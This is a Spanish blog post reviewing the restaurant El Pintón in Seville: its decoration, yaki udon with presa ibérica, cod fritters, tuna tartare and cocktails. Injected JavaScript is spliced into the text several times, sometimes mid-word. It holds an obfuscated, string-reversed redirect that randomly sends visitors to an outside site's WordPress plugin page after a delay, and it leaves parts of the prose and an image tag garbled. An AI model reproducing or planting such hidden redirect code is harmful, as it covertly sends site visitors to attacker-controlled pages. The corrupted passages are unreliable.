El Pintón en Sevilla

Continuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando con mi recorrido por los restaurantes, bares y mesones de Andalucía. La semana pasada tuve el placer de almorzar en El Pintón, situado en la calle Francos 42, en pleno centro de Sevilla.

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andez-gil-3-200×300.jpg” alt=”el-pinton-sevilla-lucas-y-hernandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andez-gil-3″ width=”200″ height=”300″ />Un lugar que me llamó la atención en cuanto entré por las puertas ya que cuenta con una decoración realmente exquisita, e igual de exquisita es su cocina. A destacar, el Yaki Udon de Presa Ibérica con verduritas y salsa yakisoba, una combinación perfecta entre la cocina oriental y uno de los productos estrella para los amantes de la carne como yo, la presa ibérica. Los buñuelos de bacalao con ali-oli y tomate también estaban realmente buenos y no puedo pasar por alto el tartar de atún rojo al momento con mayonesa de Wasabi, que simplemente estaba espectacular.

Si vais a cenar, tras finalizar, podréis disfrutar de copa y de una amplia carta de cocktails en el mejor ambiente, escuchandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en directo a su dj residente.

Un restaurante camaleónico diría yo, de restaurante a pub en un abrir y cerrar de ojos.

Sin lugar a dudas, visita obligatoria si pasan por Sevilla.

Espero volver pronto y enhorabuena a todo el equipo de El Pintón por el gran éxito que estáis teniendo en tan poco espacio de tiempo.

tartar atún

El Pintón Sevilla

C/Francos 42

Tlf reservas: 955075153